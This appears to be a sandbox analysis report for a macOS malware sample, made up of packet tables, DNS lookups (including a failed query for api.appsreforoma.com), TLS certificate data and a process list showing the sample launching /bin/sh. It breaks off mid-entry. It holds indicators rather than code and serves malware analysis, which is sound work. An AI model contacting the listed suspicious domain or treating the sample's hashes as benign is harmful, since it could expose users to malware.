Apr 19, 2024 11:45:19.345666885 CEST	443	49352	151.101.131.6	192.168.11.12
Apr 19, 2024 11:45:19.345674992 CEST	443	49352	151.101.131.6	192.168.11.12
Apr 19, 2024 11:45:19.347816944 CEST	49352	443	192.168.11.12	151.101.131.6
Apr 19, 2024 11:45:19.347908020 CEST	49352	443	192.168.11.12	151.101.131.6
Apr 19, 2024 11:45:19.347908020 CEST	49352	443	192.168.11.12	151.101.131.6
Apr 19, 2024 11:45:19.349637032 CEST	49352	443	192.168.11.12	151.101.131.6
Apr 19, 2024 11:45:19.358009100 CEST	49352	443	192.168.11.12	151.101.131.6
Apr 19, 2024 11:45:19.522874117 CEST	443	49352	151.101.131.6	192.168.11.12
Apr 19, 2024 11:45:19.523000956 CEST	443	49352	151.101.131.6	192.168.11.12
Apr 19, 2024 11:45:19.524152040 CEST	49352	443	192.168.11.12	151.101.131.6
Apr 19, 2024 11:45:19.572441101 CEST	443	49349	17.248.193.16	192.168.11.12
Apr 19, 2024 11:45:19.572551012 CEST	443	49349	17.248.193.16	192.168.11.12
Apr 19, 2024 11:45:19.572678089 CEST	443	49349	17.248.193.16	192.168.11.12
Apr 19, 2024 11:45:19.572969913 CEST	443	49349	17.248.193.16	192.168.11.12
Apr 19, 2024 11:45:19.573318958 CEST	49349	443	192.168.11.12	17.248.193.16
Apr 19, 2024 11:45:19.573760986 CEST	443	49349	17.248.193.16	192.168.11.12
Apr 19, 2024 11:45:19.582319975 CEST	443	49349	17.248.193.16	192.168.11.12
Apr 19, 2024 11:45:19.582902908 CEST	49349	443	192.168.11.12	17.248.193.16
Apr 19, 2024 11:45:19.591574907 CEST	443	49349	17.248.193.16	192.168.11.12
Apr 19, 2024 11:45:19.592715025 CEST	49349	443	192.168.11.12	17.248.193.16
Apr 19, 2024 11:45:19.600825071 CEST	443	49349	17.248.193.16	192.168.11.12
Apr 19, 2024 11:45:19.610390902 CEST	443	49349	17.248.193.16	192.168.11.12
Apr 19, 2024 11:45:19.611274004 CEST	49349	443	192.168.11.12	17.248.193.16
Apr 19, 2024 11:45:19.619771004 CEST	443	49349	17.248.193.16	192.168.11.12
Apr 19, 2024 11:45:19.620496988 CEST	49349	443	192.168.11.12	17.248.193.16
Apr 19, 2024 11:45:19.628596067 CEST	443	49349	17.248.193.16	192.168.11.12
Apr 19, 2024 11:45:19.638000011 CEST	443	49349	17.248.193.16	192.168.11.12
Apr 19, 2024 11:45:19.638801098 CEST	49349	443	192.168.11.12	17.248.193.16
Apr 19, 2024 11:45:19.647521973 CEST	443	49349	17.248.193.16	192.168.11.12
Apr 19, 2024 11:45:19.648308039 CEST	49349	443	192.168.11.12	17.248.193.16
Apr 19, 2024 11:45:19.656655073 CEST	443	49349	17.248.193.16	192.168.11.12
Apr 19, 2024 11:45:19.665854931 CEST	443	49349	17.248.193.16	192.168.11.12
Apr 19, 2024 11:45:19.666568995 CEST	49349	443	192.168.11.12	17.248.193.16
Apr 19, 2024 11:45:19.684140921 CEST	443	49349	17.248.193.16	192.168.11.12
Apr 19, 2024 11:45:19.684804916 CEST	49349	443	192.168.11.12	17.248.193.16
Apr 19, 2024 11:45:19.693598032 CEST	443	49349	17.248.193.16	192.168.11.12
Apr 19, 2024 11:45:19.694261074 CEST	49349	443	192.168.11.12	17.248.193.16
Apr 19, 2024 11:45:19.702848911 CEST	443	49349	17.248.193.16	192.168.11.12
Apr 19, 2024 11:45:19.703577042 CEST	49349	443	192.168.11.12	17.248.193.16
Apr 19, 2024 11:45:19.712061882 CEST	443	49349	17.248.193.16	192.168.11.12
Apr 19, 2024 11:45:19.713407040 CEST	49349	443	192.168.11.12	17.248.193.16
Apr 19, 2024 11:45:19.721190929 CEST	443	49349	17.248.193.16	192.168.11.12
Apr 19, 2024 11:45:19.722718000 CEST	49349	443	192.168.11.12	17.248.193.16
Apr 19, 2024 11:45:19.842216969 CEST	443	49349	17.248.193.16	192.168.11.12
Apr 19, 2024 11:45:19.842931032 CEST	49349	443	192.168.11.12	17.248.193.16
Apr 19, 2024 11:45:19.846862078 CEST	443	49349	17.248.193.16	192.168.11.12
Apr 19, 2024 11:45:19.847949028 CEST	49349	443	192.168.11.12	17.248.193.16
Apr 19, 2024 11:45:19.856132984 CEST	443	49349	17.248.193.16	192.168.11.12
Apr 19, 2024 11:45:19.856919050 CEST	49349	443	192.168.11.12	17.248.193.16
Apr 19, 2024 11:45:19.865359068 CEST	443	49349	17.248.193.16	192.168.11.12
Apr 19, 2024 11:45:19.866370916 CEST	49349	443	192.168.11.12	17.248.193.16
Apr 19, 2024 11:45:19.972743988 CEST	443	49349	17.248.193.16	192.168.11.12
Apr 19, 2024 11:45:19.974041939 CEST	49349	443	192.168.11.12	17.248.193.16
Apr 19, 2024 11:45:19.974505901 CEST	49349	443	192.168.11.12	17.248.193.16
Apr 19, 2024 11:45:21.000297070 CEST	49349	443	192.168.11.12	17.248.193.16
Apr 19, 2024 11:45:21.269304037 CEST	443	49349	17.248.193.16	192.168.11.12
Apr 19, 2024 11:45:22.193758011 CEST	49327	443	192.168.11.12	17.248.193.17
Apr 19, 2024 11:45:22.194433928 CEST	49327	443	192.168.11.12	17.248.193.17
Apr 19, 2024 11:45:22.456813097 CEST	443	49327	17.248.193.17	192.168.11.12
Apr 19, 2024 11:45:22.457406044 CEST	443	49327	17.248.193.17	192.168.11.12
Apr 19, 2024 11:45:22.457894087 CEST	49327	443	192.168.11.12	17.248.193.17
Apr 19, 2024 11:45:22.620836020 CEST	49349	443	192.168.11.12	17.248.193.16
Apr 19, 2024 11:45:22.626996040 CEST	49349	443	192.168.11.12	17.248.193.16
Apr 19, 2024 11:45:22.889842033 CEST	443	49349	17.248.193.16	192.168.11.12
Apr 19, 2024 11:45:22.890490055 CEST	49349	443	192.168.11.12	17.248.193.16
Apr 19, 2024 11:45:22.896004915 CEST	443	49349	17.248.193.16	192.168.11.12
Apr 19, 2024 11:45:55.198712111 CEST	49388	443	192.168.11.12	151.101.67.6
Apr 19, 2024 11:45:55.198853016 CEST	443	49388	151.101.67.6	192.168.11.12
Apr 19, 2024 11:45:55.199649096 CEST	49388	443	192.168.11.12	151.101.67.6
Apr 19, 2024 11:45:55.200550079 CEST	49388	443	192.168.11.12	151.101.67.6
Apr 19, 2024 11:45:55.200628042 CEST	443	49388	151.101.67.6	192.168.11.12
Apr 19, 2024 11:45:55.549778938 CEST	443	49388	151.101.67.6	192.168.11.12
Apr 19, 2024 11:45:55.550573111 CEST	49388	443	192.168.11.12	151.101.67.6
Apr 19, 2024 11:45:55.550574064 CEST	49388	443	192.168.11.12	151.101.67.6
Apr 19, 2024 11:45:55.571414948 CEST	49388	443	192.168.11.12	151.101.67.6
Apr 19, 2024 11:45:55.571659088 CEST	443	49388	151.101.67.6	192.168.11.12
Apr 19, 2024 11:45:55.572099924 CEST	443	49388	151.101.67.6	192.168.11.12
Apr 19, 2024 11:45:55.572248936 CEST	49388	443	192.168.11.12	151.101.67.6
Apr 19, 2024 11:45:55.572628021 CEST	49388	443	192.168.11.12	151.101.67.6
Apr 19, 2024 11:45:55.601638079 CEST	49389	443	192.168.11.12	151.101.67.6
Apr 19, 2024 11:45:55.601771116 CEST	443	49389	151.101.67.6	192.168.11.12
Apr 19, 2024 11:45:55.602425098 CEST	49389	443	192.168.11.12	151.101.67.6
Apr 19, 2024 11:45:55.603301048 CEST	49389	443	192.168.11.12	151.101.67.6
Apr 19, 2024 11:45:55.603393078 CEST	443	49389	151.101.67.6	192.168.11.12
Apr 19, 2024 11:45:55.888230085 CEST	49390	443	192.168.11.12	151.101.67.6
Apr 19, 2024 11:45:55.888370991 CEST	443	49390	151.101.67.6	192.168.11.12
Apr 19, 2024 11:45:55.889127970 CEST	49390	443	192.168.11.12	151.101.67.6
Apr 19, 2024 11:45:55.890171051 CEST	49390	443	192.168.11.12	151.101.67.6
Apr 19, 2024 11:45:55.890295982 CEST	443	49390	151.101.67.6	192.168.11.12
Apr 19, 2024 11:45:55.949318886 CEST	443	49389	151.101.67.6	192.168.11.12
Apr 19, 2024 11:45:55.951328039 CEST	49389	443	192.168.11.12	151.101.67.6
Apr 19, 2024 11:45:55.951328039 CEST	49389	443	192.168.11.12	151.101.67.6
Apr 19, 2024 11:45:55.957997084 CEST	49389	443	192.168.11.12	151.101.67.6
Apr 19, 2024 11:45:55.958278894 CEST	443	49389	151.101.67.6	192.168.11.12
Apr 19, 2024 11:45:55.958918095 CEST	49389	443	192.168.11.12	151.101.67.6
Apr 19, 2024 11:45:55.958950043 CEST	443	49389	151.101.67.6	192.168.11.12
Apr 19, 2024 11:45:55.959671974 CEST	49389	443	192.168.11.12	151.101.67.6
Apr 19, 2024 11:45:55.977972984 CEST	49391	443	192.168.11.12	151.101.67.6
Apr 19, 2024 11:45:55.978121042 CEST	443	49391	151.101.67.6	192.168.11.12
Apr 19, 2024 11:45:55.978847980 CEST	49391	443	192.168.11.12	151.101.67.6
Apr 19, 2024 11:45:55.979561090 CEST	49391	443	192.168.11.12	151.101.67.6
Apr 19, 2024 11:45:55.979638100 CEST	443	49391	151.101.67.6	192.168.11.12
Apr 19, 2024 11:45:56.322523117 CEST	443	49391	151.101.67.6	192.168.11.12
Apr 19, 2024 11:45:56.324527979 CEST	49391	443	192.168.11.12	151.101.67.6
Apr 19, 2024 11:45:56.324527979 CEST	49391	443	192.168.11.12	151.101.67.6
Apr 19, 2024 11:45:56.331159115 CEST	49391	443	192.168.11.12	151.101.67.6
Apr 19, 2024 11:45:56.331324100 CEST	443	49391	151.101.67.6	192.168.11.12
Apr 19, 2024 11:45:56.331659079 CEST	443	49391	151.101.67.6	192.168.11.12
Apr 19, 2024 11:45:56.332056999 CEST	49391	443	192.168.11.12	151.101.67.6
Apr 19, 2024 11:45:56.332295895 CEST	49391	443	192.168.11.12	151.101.67.6
Apr 19, 2024 11:45:56.345088959 CEST	49392	443	192.168.11.12	151.101.67.6
Apr 19, 2024 11:45:56.345192909 CEST	443	49392	151.101.67.6	192.168.11.12
Apr 19, 2024 11:45:56.345933914 CEST	49392	443	192.168.11.12	151.101.67.6
Apr 19, 2024 11:45:56.346664906 CEST	49392	443	192.168.11.12	151.101.67.6
Apr 19, 2024 11:45:56.346757889 CEST	443	49392	151.101.67.6	192.168.11.12
Apr 19, 2024 11:45:56.693417072 CEST	443	49392	151.101.67.6	192.168.11.12
Apr 19, 2024 11:45:56.694510937 CEST	49392	443	192.168.11.12	151.101.67.6
Apr 19, 2024 11:45:56.694510937 CEST	49392	443	192.168.11.12	151.101.67.6
Apr 19, 2024 11:45:56.705035925 CEST	49392	443	192.168.11.12	151.101.67.6
Apr 19, 2024 11:45:56.705359936 CEST	443	49392	151.101.67.6	192.168.11.12
Apr 19, 2024 11:45:56.705987930 CEST	49392	443	192.168.11.12	151.101.67.6
Apr 19, 2024 11:45:57.244354963 CEST	443	49390	151.101.67.6	192.168.11.12
Apr 19, 2024 11:45:57.245358944 CEST	49390	443	192.168.11.12	151.101.67.6
Apr 19, 2024 11:45:57.245687962 CEST	49390	443	192.168.11.12	151.101.67.6
Apr 19, 2024 11:45:57.266006947 CEST	49390	443	192.168.11.12	151.101.67.6
Apr 19, 2024 11:45:57.266189098 CEST	443	49390	151.101.67.6	192.168.11.12
Apr 19, 2024 11:45:57.266650915 CEST	443	49390	151.101.67.6	192.168.11.12
Apr 19, 2024 11:45:57.266814947 CEST	49390	443	192.168.11.12	151.101.67.6
Apr 19, 2024 11:45:57.267188072 CEST	49390	443	192.168.11.12	151.101.67.6
Apr 19, 2024 11:45:57.333534002 CEST	49393	443	192.168.11.12	151.101.67.6
Apr 19, 2024 11:45:57.333673954 CEST	443	49393	151.101.67.6	192.168.11.12
Apr 19, 2024 11:45:57.334422112 CEST	49393	443	192.168.11.12	151.101.67.6
Apr 19, 2024 11:45:57.336683035 CEST	49393	443	192.168.11.12	151.101.67.6
Apr 19, 2024 11:45:57.336761951 CEST	443	49393	151.101.67.6	192.168.11.12
Apr 19, 2024 11:45:57.680196047 CEST	443	49393	151.101.67.6	192.168.11.12
Apr 19, 2024 11:45:57.681057930 CEST	49393	443	192.168.11.12	151.101.67.6
Apr 19, 2024 11:45:57.681057930 CEST	49393	443	192.168.11.12	151.101.67.6
Apr 19, 2024 11:45:57.695488930 CEST	49393	443	192.168.11.12	151.101.67.6
Apr 19, 2024 11:45:57.695666075 CEST	443	49393	151.101.67.6	192.168.11.12
Apr 19, 2024 11:45:57.695988894 CEST	443	49393	151.101.67.6	192.168.11.12
Apr 19, 2024 11:45:57.696923018 CEST	49393	443	192.168.11.12	151.101.67.6
Apr 19, 2024 11:45:57.697058916 CEST	49393	443	192.168.11.12	151.101.67.6
Apr 19, 2024 11:45:59.213131905 CEST	49399	443	192.168.11.12	151.101.67.6
Apr 19, 2024 11:45:59.213270903 CEST	443	49399	151.101.67.6	192.168.11.12
Apr 19, 2024 11:45:59.214549065 CEST	49399	443	192.168.11.12	151.101.67.6
Apr 19, 2024 11:45:59.215413094 CEST	49399	443	192.168.11.12	151.101.67.6
Apr 19, 2024 11:45:59.215492964 CEST	443	49399	151.101.67.6	192.168.11.12
Apr 19, 2024 11:45:59.547962904 CEST	443	49399	151.101.67.6	192.168.11.12
Apr 19, 2024 11:45:59.548880100 CEST	49399	443	192.168.11.12	151.101.67.6
Apr 19, 2024 11:45:59.548919916 CEST	49399	443	192.168.11.12	151.101.67.6
Apr 19, 2024 11:45:59.557486057 CEST	49399	443	192.168.11.12	151.101.67.6
Apr 19, 2024 11:45:59.557651997 CEST	443	49399	151.101.67.6	192.168.11.12
Apr 19, 2024 11:45:59.557974100 CEST	443	49399	151.101.67.6	192.168.11.12
Apr 19, 2024 11:45:59.558666945 CEST	49399	443	192.168.11.12	151.101.67.6
Apr 19, 2024 11:45:59.558667898 CEST	49399	443	192.168.11.12	151.101.67.6
Apr 19, 2024 11:46:16.924137115 CEST	49344	80	192.168.11.12	17.253.83.196
Apr 19, 2024 11:46:17.083436966 CEST	80	49344	17.253.83.196	192.168.11.12
Apr 19, 2024 11:46:17.084343910 CEST	49344	80	192.168.11.12	17.253.83.196
Apr 19, 2024 11:47:24.727986097 CEST	49401	443	192.168.11.12	151.101.195.6
Apr 19, 2024 11:47:24.728127003 CEST	443	49401	151.101.195.6	192.168.11.12
Apr 19, 2024 11:47:24.728878975 CEST	49401	443	192.168.11.12	151.101.195.6
Apr 19, 2024 11:47:24.731817007 CEST	49401	443	192.168.11.12	151.101.195.6
Apr 19, 2024 11:47:24.731954098 CEST	443	49401	151.101.195.6	192.168.11.12
Apr 19, 2024 11:47:25.077104092 CEST	443	49401	151.101.195.6	192.168.11.12
Apr 19, 2024 11:47:25.078041077 CEST	49401	443	192.168.11.12	151.101.195.6
Apr 19, 2024 11:47:25.078041077 CEST	49401	443	192.168.11.12	151.101.195.6
Apr 19, 2024 11:47:25.084115982 CEST	49401	443	192.168.11.12	151.101.195.6
Apr 19, 2024 11:47:25.084264040 CEST	443	49401	151.101.195.6	192.168.11.12
Apr 19, 2024 11:47:25.084518909 CEST	443	49401	151.101.195.6	192.168.11.12
Apr 19, 2024 11:47:25.085668087 CEST	49401	443	192.168.11.12	151.101.195.6
Apr 19, 2024 11:47:25.085668087 CEST	49401	443	192.168.11.12	151.101.195.6
Apr 19, 2024 11:47:25.100814104 CEST	49402	443	192.168.11.12	151.101.195.6
Apr 19, 2024 11:47:25.100900888 CEST	443	49402	151.101.195.6	192.168.11.12
Apr 19, 2024 11:47:25.101954937 CEST	49402	443	192.168.11.12	151.101.195.6
Apr 19, 2024 11:47:25.102603912 CEST	49402	443	192.168.11.12	151.101.195.6
Apr 19, 2024 11:47:25.102670908 CEST	443	49402	151.101.195.6	192.168.11.12
Apr 19, 2024 11:47:25.450468063 CEST	443	49402	151.101.195.6	192.168.11.12
Apr 19, 2024 11:47:25.451483965 CEST	49402	443	192.168.11.12	151.101.195.6
Apr 19, 2024 11:47:25.451484919 CEST	49402	443	192.168.11.12	151.101.195.6
Apr 19, 2024 11:47:25.459808111 CEST	49402	443	192.168.11.12	151.101.195.6
Apr 19, 2024 11:47:25.460136890 CEST	443	49402	151.101.195.6	192.168.11.12
Apr 19, 2024 11:47:25.460901976 CEST	49402	443	192.168.11.12	151.101.195.6
Apr 19, 2024 11:47:25.460983038 CEST	443	49402	151.101.195.6	192.168.11.12
Apr 19, 2024 11:47:25.461584091 CEST	49402	443	192.168.11.12	151.101.195.6
Apr 19, 2024 11:47:25.482439041 CEST	49403	443	192.168.11.12	151.101.195.6
Apr 19, 2024 11:47:25.482579947 CEST	443	49403	151.101.195.6	192.168.11.12
Apr 19, 2024 11:47:25.483684063 CEST	49403	443	192.168.11.12	151.101.195.6
Apr 19, 2024 11:47:25.484600067 CEST	49403	443	192.168.11.12	151.101.195.6
Apr 19, 2024 11:47:25.484708071 CEST	443	49403	151.101.195.6	192.168.11.12
Apr 19, 2024 11:47:25.829374075 CEST	443	49403	151.101.195.6	192.168.11.12
Apr 19, 2024 11:47:25.830349922 CEST	49403	443	192.168.11.12	151.101.195.6
Apr 19, 2024 11:47:25.830349922 CEST	49403	443	192.168.11.12	151.101.195.6
Apr 19, 2024 11:47:25.837255955 CEST	49403	443	192.168.11.12	151.101.195.6
Apr 19, 2024 11:47:25.837426901 CEST	443	49403	151.101.195.6	192.168.11.12
Apr 19, 2024 11:47:25.837721109 CEST	443	49403	151.101.195.6	192.168.11.12
Apr 19, 2024 11:47:25.838200092 CEST	49403	443	192.168.11.12	151.101.195.6
Apr 19, 2024 11:47:25.838459969 CEST	49403	443	192.168.11.12	151.101.195.6
Apr 19, 2024 11:47:25.853281021 CEST	49404	443	192.168.11.12	151.101.195.6
Apr 19, 2024 11:47:25.853421926 CEST	443	49404	151.101.195.6	192.168.11.12
Apr 19, 2024 11:47:25.854404926 CEST	49404	443	192.168.11.12	151.101.195.6
Apr 19, 2024 11:47:25.855701923 CEST	49404	443	192.168.11.12	151.101.195.6
Apr 19, 2024 11:47:25.855813026 CEST	443	49404	151.101.195.6	192.168.11.12
Apr 19, 2024 11:47:26.205106020 CEST	443	49404	151.101.195.6	192.168.11.12
Apr 19, 2024 11:47:26.207202911 CEST	49404	443	192.168.11.12	151.101.195.6
Apr 19, 2024 11:47:26.207318068 CEST	49404	443	192.168.11.12	151.101.195.6
Apr 19, 2024 11:47:26.214433908 CEST	49404	443	192.168.11.12	151.101.195.6
Apr 19, 2024 11:47:26.214755058 CEST	443	49404	151.101.195.6	192.168.11.12
Apr 19, 2024 11:47:26.215408087 CEST	49404	443	192.168.11.12	151.101.195.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 19, 2024 11:45:26.312273026 CEST	49789	53	192.168.11.12	1.1.1.1
Apr 19, 2024 11:45:26.481062889 CEST	53	49789	1.1.1.1	192.168.11.12
Apr 19, 2024 11:45:41.428456068 CEST	53	52458	1.1.1.1	192.168.11.12
Apr 19, 2024 11:45:48.480866909 CEST	59639	53	192.168.11.12	1.1.1.1
Apr 19, 2024 11:45:55.029654026 CEST	61844	53	192.168.11.12	1.1.1.1
Apr 19, 2024 11:45:55.195477009 CEST	53	61844	1.1.1.1	192.168.11.12
Apr 19, 2024 11:47:24.558094978 CEST	58309	53	192.168.11.12	1.1.1.1
Apr 19, 2024 11:47:24.724334002 CEST	53	58309	1.1.1.1	192.168.11.12

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Apr 19, 2024 11:45:47.546689987 CEST	192.168.11.12	1.1.1.1	35ef	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 19, 2024 11:45:26.312273026 CEST	192.168.11.12	1.1.1.1	0x317	Standard query (0)	api.appsreforoma.com	A (IP address)	IN (0x0001)	false
Apr 19, 2024 11:45:48.480866909 CEST	192.168.11.12	1.1.1.1	0x615b	Standard query (0)	updates.cdn-apple.com	A (IP address)	IN (0x0001)	false
Apr 19, 2024 11:45:55.029654026 CEST	192.168.11.12	1.1.1.1	0xfcc0	Standard query (0)	apis.apple.map.fastly.net	A (IP address)	IN (0x0001)	false
Apr 19, 2024 11:47:24.558094978 CEST	192.168.11.12	1.1.1.1	0x376a	Standard query (0)	apis.apple.map.fastly.net	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Apr 19, 2024 11:45:18.418520927 CEST	1.1.1.1	192.168.11.12	0x146a	No error (0)	gateway.fe2.apple-dns.net		17.248.193.16	A (IP address)	IN (0x0001)	false
Apr 19, 2024 11:45:18.418520927 CEST	1.1.1.1	192.168.11.12	0x146a	No error (0)	gateway.fe2.apple-dns.net		17.248.193.20	A (IP address)	IN (0x0001)	false
Apr 19, 2024 11:45:18.418520927 CEST	1.1.1.1	192.168.11.12	0x146a	No error (0)	gateway.fe2.apple-dns.net		17.248.193.18	A (IP address)	IN (0x0001)	false
Apr 19, 2024 11:45:26.481062889 CEST	1.1.1.1	192.168.11.12	0x317	Name error (3)	api.appsreforoma.com	none	none	A (IP address)	IN (0x0001)	false
Apr 19, 2024 11:45:48.641891003 CEST	1.1.1.1	192.168.11.12	0x615b	No error (0)	updates.cdn-apple.com	updates.cdn-apple.com.akadns.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 11:45:55.195477009 CEST	1.1.1.1	192.168.11.12	0xfcc0	No error (0)	apis.apple.map.fastly.net		151.101.131.6	A (IP address)	IN (0x0001)	false
Apr 19, 2024 11:45:55.195477009 CEST	1.1.1.1	192.168.11.12	0xfcc0	No error (0)	apis.apple.map.fastly.net		151.101.67.6	A (IP address)	IN (0x0001)	false
Apr 19, 2024 11:45:55.195477009 CEST	1.1.1.1	192.168.11.12	0xfcc0	No error (0)	apis.apple.map.fastly.net		151.101.3.6	A (IP address)	IN (0x0001)	false
Apr 19, 2024 11:45:55.195477009 CEST	1.1.1.1	192.168.11.12	0xfcc0	No error (0)	apis.apple.map.fastly.net		151.101.195.6	A (IP address)	IN (0x0001)	false
Apr 19, 2024 11:47:24.724334002 CEST	1.1.1.1	192.168.11.12	0x376a	No error (0)	apis.apple.map.fastly.net		151.101.195.6	A (IP address)	IN (0x0001)	false
Apr 19, 2024 11:47:24.724334002 CEST	1.1.1.1	192.168.11.12	0x376a	No error (0)	apis.apple.map.fastly.net		151.101.67.6	A (IP address)	IN (0x0001)	false
Apr 19, 2024 11:47:24.724334002 CEST	1.1.1.1	192.168.11.12	0x376a	No error (0)	apis.apple.map.fastly.net		151.101.3.6	A (IP address)	IN (0x0001)	false
Apr 19, 2024 11:47:24.724334002 CEST	1.1.1.1	192.168.11.12	0x376a	No error (0)	apis.apple.map.fastly.net		151.101.131.6	A (IP address)	IN (0x0001)	false

HTTPS Connections

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Apr 19, 2024 11:45:18.591979980 CEST	151.101.131.6	443	192.168.11.12	49347	CN=bag.itunes.apple.com, O=Apple Inc., L=Cupertino, ST=California, C=US, SERIALNUMBER=C0806592, OID.1.3.6.1.4.1.311.60.2.1.2=California, OID.1.3.6.1.4.1.311.60.2.1.3=US, OID.2.5.4.15=Private Organization CN=Apple Public EV Server RSA CA 2 - G1, O=Apple Inc., C=US	CN=Apple Public EV Server RSA CA 2 - G1, O=Apple Inc., C=US CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Mon Nov 27 22:00:02 CET 2023 Wed Apr 29 14:54:50 CEST 2020	Sat May 25 23:10:02 CEST 2024 Thu Apr 11 01:59:59 CEST 2030	771,49196-49195-49188-49187-49162-49161-52393-49200-49199-49192-49191-49172-49171-52392-157-156-61-60-53-47-49160-49170-10,65281-0-23-13-5-13172-18-16-11-10,29-23-24-25,0	5c118da645babe52f060d0754256a73c
Apr 19, 2024 11:45:18.591979980 CEST	151.101.131.6	443	192.168.11.12	49347	CN=Apple Public EV Server RSA CA 2 - G1, O=Apple Inc., C=US	CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Wed Apr 29 14:54:50 CEST 2020	Thu Apr 11 01:59:59 CEST 2030		5c118da645babe52f060d0754256a73c
Apr 19, 2024 11:45:18.957603931 CEST	151.101.131.6	443	192.168.11.12	49350	CN=bag.itunes.apple.com, O=Apple Inc., L=Cupertino, ST=California, C=US, SERIALNUMBER=C0806592, OID.1.3.6.1.4.1.311.60.2.1.2=California, OID.1.3.6.1.4.1.311.60.2.1.3=US, OID.2.5.4.15=Private Organization CN=Apple Public EV Server RSA CA 2 - G1, O=Apple Inc., C=US	CN=Apple Public EV Server RSA CA 2 - G1, O=Apple Inc., C=US CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Mon Nov 27 22:00:02 CET 2023 Wed Apr 29 14:54:50 CEST 2020	Sat May 25 23:10:02 CEST 2024 Thu Apr 11 01:59:59 CEST 2030	771,49196-49195-49188-49187-49162-49161-52393-49200-49199-49192-49191-49172-49171-52392-157-156-61-60-53-47-49160-49170-10,65281-0-23-13-5-13172-18-16-11-10,29-23-24-25,0	5c118da645babe52f060d0754256a73c
Apr 19, 2024 11:45:18.957603931 CEST	151.101.131.6	443	192.168.11.12	49350	CN=Apple Public EV Server RSA CA 2 - G1, O=Apple Inc., C=US	CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Wed Apr 29 14:54:50 CEST 2020	Thu Apr 11 01:59:59 CEST 2030		5c118da645babe52f060d0754256a73c
Apr 19, 2024 11:45:18.960721016 CEST	17.248.193.16	443	192.168.11.12	49349	CN=gateway.icloud.com, O=Apple Inc., ST=California, C=US C=US, O=Apple Inc., OU=Certification Authority, CN=Apple IST CA 2 - G1 C=US, O=Apple Inc., OU=Certification Authority, CN=Apple IST CA 2 - G1	C=US, O=Apple Inc., OU=Certification Authority, CN=Apple IST CA 2 - G1 CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE CN=Apple Root CA, OU=Apple Certification Authority, O=Apple Inc., C=US	Wed Nov 01 09:04:18 CET 2023 Wed Dec 12 13:00:00 CET 2018 Thu Apr 28 23:38:00 CEST 2022	Sat Nov 30 09:04:17 CET 2024 Wed May 07 14:00:00 CEST 2025 Wed May 07 02:00:00 CEST 2025	771,49196-49195-49188-49187-49162-49161-52393-49200-49199-49192-49191-49172-49171-52392-157-156-61-60-53-47-49160-49170-10,65281-0-23-13-5-13172-18-16-11-10,29-23-24-25,0	5c118da645babe52f060d0754256a73c
					C=US, O=Apple Inc., OU=Certification Authority, CN=Apple IST CA 2 - G1	CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Wed Dec 12 13:00:00 CET 2018	Wed May 07 14:00:00 CEST 2025
					C=US, O=Apple Inc., OU=Certification Authority, CN=Apple IST CA 2 - G1	CN=Apple Root CA, OU=Apple Certification Authority, O=Apple Inc., C=US	Thu Apr 28 23:38:00 CEST 2022	Wed May 07 02:00:00 CEST 2025
Apr 19, 2024 11:45:19.345654964 CEST	151.101.131.6	443	192.168.11.12	49352	CN=bag.itunes.apple.com, O=Apple Inc., L=Cupertino, ST=California, C=US, SERIALNUMBER=C0806592, OID.1.3.6.1.4.1.311.60.2.1.2=California, OID.1.3.6.1.4.1.311.60.2.1.3=US, OID.2.5.4.15=Private Organization CN=Apple Public EV Server RSA CA 2 - G1, O=Apple Inc., C=US	CN=Apple Public EV Server RSA CA 2 - G1, O=Apple Inc., C=US CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Mon Nov 27 22:00:02 CET 2023 Wed Apr 29 14:54:50 CEST 2020	Sat May 25 23:10:02 CEST 2024 Thu Apr 11 01:59:59 CEST 2030	771,49196-49195-49188-49187-49162-49161-52393-49200-49199-49192-49191-49172-49171-52392-157-156-61-60-53-47-49160-49170-10,65281-0-23-13-5-13172-18-16-11-10,29-23-24-25,0	5c118da645babe52f060d0754256a73c
Apr 19, 2024 11:45:19.345654964 CEST	151.101.131.6	443	192.168.11.12	49352	CN=Apple Public EV Server RSA CA 2 - G1, O=Apple Inc., C=US	CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Wed Apr 29 14:54:50 CEST 2020	Thu Apr 11 01:59:59 CEST 2030		5c118da645babe52f060d0754256a73c

System Behavior

Analysis Process: xpcproxy PID: 611, Parent PID: 1

General

Start time (UTC):	09:45:17
Start date (UTC):	19/04/2024
Path:	/usr/libexec/xpcproxy
Arguments:	-
File size:	44048 bytes
MD5 hash:	4764d9eafe6b7dac23253a9f8b7f73d6

Start time (UTC):	09:45:17
Start date (UTC):	19/04/2024
Path:	/usr/libexec/nsurlstoraged
Arguments:	/usr/libexec/nsurlstoraged --privileged
File size:	246624 bytes
MD5 hash:	321b0a40e24b45f0af49ba42742b3f64

Start time (UTC):	09:45:25
Start date (UTC):	19/04/2024
Path:	/Library/Frameworks/Mono.framework/Versions/4.4.2/bin/mono-sgen32
Arguments:	-
File size:	3722408 bytes
MD5 hash:	8910349f44a940d8d79318367855b236

Start time (UTC):	09:45:25
Start date (UTC):	19/04/2024
Path:	/Users/bernard/Desktop/malw_sampl
Arguments:	/Users/bernard/Desktop/malw_sampl
File size:	47222 bytes
MD5 hash:	d3e39930bca4c4b57f6e1f241f0a31c8

Start time (UTC):	09:45:25
Start date (UTC):	19/04/2024
Path:	/bin/sh
Arguments:	-
File size:	618480 bytes
MD5 hash:	be55e8952a262d0e524239dbf82191ed

Start time (UTC):	09:45:25
